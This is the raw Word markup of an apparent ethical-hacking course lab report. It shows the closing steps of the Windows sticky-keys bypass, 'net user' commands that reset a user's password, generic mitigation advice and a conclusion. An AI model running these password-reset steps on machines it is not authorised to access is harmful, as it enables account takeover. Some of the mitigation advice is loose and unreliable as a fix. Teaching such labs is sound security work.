          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="444444"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">v. power on windows system, which should be password protected </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000042">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="444444"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="444444"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="3505200"/>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444444"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="444444"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">vi. press sticky key 5 times</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000044">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="444444"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000045">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="444444"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="444444"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">vii. Using command prompt access the net user command to find the available users and change the password of a specific user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000046">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="444444"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000047">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="444444"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="444444"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">   &gt;net  user </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000048">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="444444"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="444444"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  &gt;net   user   username   *     //replace the username with the current user name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000049">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="444444"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="444444"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  &gt;change the password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004A">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="444444"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004B">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="444444"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="444444"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="2286000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>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color w:val="444444"/>
          <w:highlight w:val="whit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tl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Part 3- Specify the ways to patch the sticky key vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:leader="none" w:pos="4320"/>
          <w:tab w:val="right" w:leader="none" w:pos="8640"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The sticky key vulnerability is a security flaw that can be exploited to gain unauthorized access to a system. It typically involves manipulating the sticky keys feature in Windows operating systems to open a command prompt with system-level privileges. Here are several ways to patch or mitigate this vulnerability:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000050">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51">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:leader="none" w:pos="4320"/>
          <w:tab w:val="right" w:leader="none" w:pos="8640"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Official Patch: Microsoft typically releases patches to address known vulnerabilities, including the sticky keys exploit. Ensure your system is up to date with the latest security updates from Microsoft.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000052">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53">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:leader="none" w:pos="4320"/>
          <w:tab w:val="right" w:leader="none" w:pos="8640"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Group Policy: You can configure Group Policy settings to disable the sticky keys feature entirely. This prevents the exploit from being used to gain unauthorized access. The specific steps may vary depending on your Windows version, but generally, you can find the setting in Group Policy Editor under User Configuration &gt; Administrative Templates &gt; Windows Components &gt; Accessibility &gt; "Use the computer without a mouse or keyboard."</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000054">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55">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:leader="none" w:pos="4320"/>
          <w:tab w:val="right" w:leader="none" w:pos="8640"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Registry Edit: For systems where Group Policy isn't available or feasible, you can edit the Windows Registry to disable the sticky keys feature. This involves modifying the HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys registry key. Setting the Flags value to 506 disables sticky keys. Always exercise caution when editing the registry, as improper changes can cause system instability.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000056">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57">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:leader="none" w:pos="4320"/>
          <w:tab w:val="right" w:leader="none" w:pos="8640"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Third-Party Tools: There are third-party security tools and utilities designed to detect and mitigate various Windows vulnerabilities, including the sticky keys exploit. These tools may offer additional layers of protection beyond what's provided by default in Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000058">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59">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:leader="none" w:pos="4320"/>
          <w:tab w:val="right" w:leader="none" w:pos="8640"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">System Hardening: Implement additional security measures to harden your system against potential exploits. This includes practices such as using strong, unique passwords, enabling firewalls, limiting user privileges, and employing intrusion detection systems.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005A">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5B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:leader="none" w:pos="4320"/>
          <w:tab w:val="right" w:leader="none" w:pos="8640"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Security Awareness Training: Educate users about the risks associated with social engineering attacks, as the sticky keys exploit often requires physical access to the system. Encourage users to report suspicious activity and to follow best practices for maintaining the security of their devices.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005C">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5D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:leader="none" w:pos="4320"/>
          <w:tab w:val="right" w:leader="none" w:pos="8640"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Monitoring and Detection: Implement monitoring and detection mechanisms to identify and respond to unauthorized access attempts. This may involve deploying intrusion detection systems, log monitoring, and auditing tools to detect and investigate suspicious activity on your network.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005E">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5F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:leader="none" w:pos="4320"/>
          <w:tab w:val="right" w:leader="none" w:pos="8640"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vendor Support: If you're using specialized software or hardware that's vulnerable to the sticky keys exploit, contact the vendor for guidance on mitigating the vulnerability. They may provide patches, workarounds, or other recommendations to address the issue.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000060">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:leader="none" w:pos="4320"/>
          <w:tab w:val="right" w:leader="none" w:pos="8640"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000061">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:leader="none" w:pos="4320"/>
          <w:tab w:val="right" w:leader="none" w:pos="8640"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">By employing a combination of these methods, you can effectively patch or mitigate the sticky keys vulnerability and enhance the security of your systems against potential exploits.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tl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Conclusion - </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000066">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:leader="none" w:pos="4320"/>
          <w:tab w:val="right" w:leader="none" w:pos="8640"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This lab covered vulnerability scanning with Nessus and exploiting the sticky keys vulnerability on Windows 7 to gain unauthorized system access. We learned methods to patch this vulnerability, such as applying security updates, disabling sticky keys via Group Policy or Registry edits, using third-party tools, hardening systems, security training, monitoring, and seeking vendor guidance. The lab provided hands-on experience identifying and exploiting vulnerabilities, while emphasizing the importance of proactive security measures to protect against cyber threats.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296" w:top="129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1"/>
      <w:pBdr>
        <w:top w:color="000000" w:space="1" w:sz="4" w:val="single"/>
        <w:left w:color="000000" w:space="0" w:sz="0" w:val="none"/>
        <w:bottom w:color="000000" w:space="0" w:sz="0" w:val="none"/>
        <w:right w:color="000000" w:space="0" w:sz="0" w:val="none"/>
        <w:between w:space="0" w:sz="0" w:val="nil"/>
      </w:pBdr>
      <w:shd w:fill="auto" w:val="clear"/>
      <w:tabs>
        <w:tab w:val="center" w:leader="none" w:pos="4320"/>
        <w:tab w:val="right" w:leader="none" w:pos="8640"/>
        <w:tab w:val="right" w:leader="none" w:pos="897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tl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">IT321 Ethical Hacking</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EH</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Style w:val="Heading1"/>
      <w:tabs>
        <w:tab w:val="left" w:leader="none" w:pos="0"/>
        <w:tab w:val="left" w:leader="none" w:pos="0"/>
        <w:tab w:val="left" w:leader="none" w:pos="0"/>
      </w:tabs>
      <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
      <w:ind w:left="0" w:right="720" w:firstLine="0"/>
      <w:jc w:val="cente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123825</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="776288" cy="769709"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:wrapSquare wrapText="bothSides" distB="0" distT="0" distL="0" distR="0"/>
          <wp:docPr id="1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76288" cy="769709"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect"/>
                  <a:ln/>
                </pic:spPr>
              </pic:pic>
            </a:graphicData>
          </a:graphic>
        </wp:anchor>
      </w:drawing>
    </w:r>
  </w:p>
  <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006A">
    <w:pPr>
      <w:pStyle w:val="Heading1"/>
      <w:tabs>
        <w:tab w:val="left" w:leader="none" w:pos="0"/>
        <w:tab w:val="left" w:leader="none" w:pos="0"/>
        <w:tab w:val="left" w:leader="none" w:pos="0"/>
        <w:tab w:val="left" w:leader="none" w:pos="8602"/>
      </w:tabs>
      <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
      <w:ind w:left="0" w:right="720" w:firstLine="0"/>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:sz w:val="26"/>
        <w:szCs w:val="26"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rtl w:val="0"/>
      </w:rPr>
    </w:r>
  </w:p>
  <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006B">
    <w:pPr>
      <w:pStyle w:val="Heading1"/>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:leader="none" w:pos="0"/>
        <w:tab w:val="left" w:leader="none" w:pos="0"/>
        <w:tab w:val="left" w:leader="none" w:pos="0"/>
        <w:tab w:val="left" w:leader="none" w:pos="8602"/>
      </w:tabs>
      <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
      <w:ind w:left="0" w:right="720" w:firstLine="0"/>
      <w:jc w:val="center"/>
      <w:rPr/>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rtl w:val="0"/>
      </w:rPr>
    </w:r>
  </w:p>
  <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006C">
    <w:pPr>
      <w:pStyle w:val="Heading1"/>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:leader="none" w:pos="0"/>
        <w:tab w:val="left" w:leader="none" w:pos="0"/>
        <w:tab w:val="left" w:leader="none" w:pos="0"/>
        <w:tab w:val="left" w:leader="none" w:pos="8602"/>
      </w:tabs>
      <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
      <w:ind w:left="0" w:right="720" w:firstLine="0"/>
      <w:jc w:val="center"/>
      <w:rPr/>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>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06D">
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:leader="none" w:pos="0"/>
        <w:tab w:val="left" w:leader="none" w:pos="0"/>
        <w:tab w:val="left" w:leader="none" w:pos="8602"/>
      </w:tabs>
      <w:ind w:left="432" w:hanging="432"/>
      <w:rPr/>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">                                        </w:t>
    </w:r>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:b w:val="1"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">              A.Y.2023-24</w:t>
    </w:r>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rtl w:val="0"/>
      </w:rPr>
    </w:r>
  </w:p>
  <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006E">
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:leader="none" w:pos="0"/>
        <w:tab w:val="left" w:leader="none" w:pos="0"/>
        <w:tab w:val="left" w:leader="none" w:pos="8602"/>
      </w:tabs>
      <w:ind w:left="432" w:hanging="432"/>
      <w:rPr>
        <w:u w:val="no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0"/>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leader="none" w:pos="0"/>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leader="none" w:pos="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leader="none" w:pos="0"/>
      </w:tabs>
      <w:spacing w:after="0" w:before="240" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="864" w:right="0" w:hanging="864"/>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0"/>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leader="none" w:pos="0"/>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leader="none" w:pos="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leader="none" w:pos="0"/>
      </w:tabs>
      <w:spacing w:after="0" w:before="240" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="864" w:right="0" w:hanging="864"/>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yperlink" Target="https://www.tenable.com/downloads/nessus?loginAttempted=true" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://127.0.0.1:883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OKdRjvdStklMK/6p/tecCLxfpQ==">CgMxLjA4AHIhMVdCNFJsX3htX2JTLURPdmhsTzNGaGNDQ1ltZHZfQTdG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